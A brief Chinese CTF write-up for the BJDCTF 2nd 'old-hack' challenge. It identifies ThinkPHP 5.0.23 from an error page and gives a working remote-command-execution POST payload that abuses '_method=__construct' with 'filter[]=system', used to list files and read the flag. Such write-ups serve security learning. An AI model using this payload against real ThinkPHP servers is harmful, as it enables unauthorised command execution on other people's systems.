您的位置: 首页 > 文章 > [BJDCTF 2nd]old-hack_thinkphp漏洞 [BJDCTF 2nd]old-hack_thinkphp漏洞 分类: 文章 • 2024-10-21 11:47:22 [BJDCTF 2nd]old-hack_thinkphp5漏洞 进入页面提示是thinkphp,先构造一个报错 然后看到版本为THINK_VERSION5.0.23 然后百度查询漏洞: payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST提交尝试一下,发现可行,然后就cat /flag
![[BJDCTF 2nd]old-hack_thinkphp漏洞](/default/index/img?u=aHR0cHM6Ly9waWFuc2hlbi5jb20vaW1hZ2VzLzcwMy81MTc4Y2Y4ZTM0NGU5MDU1ZDI1ZWE1M2NkMmE1ZmZhZi5wbmc= "[BJDCTF 2nd]old-hack_thinkphp漏洞")
![[BJDCTF 2nd]old-hack_thinkphp漏洞](/default/index/img?u=aHR0cHM6Ly9waWFuc2hlbi5jb20vaW1hZ2VzLzQyOC80NjEzMTBlMzJjYWIwNGVlNmFlNDg1YzQwNjgwMDM3Yy5wbmc= "[BJDCTF 2nd]old-hack_thinkphp漏洞")
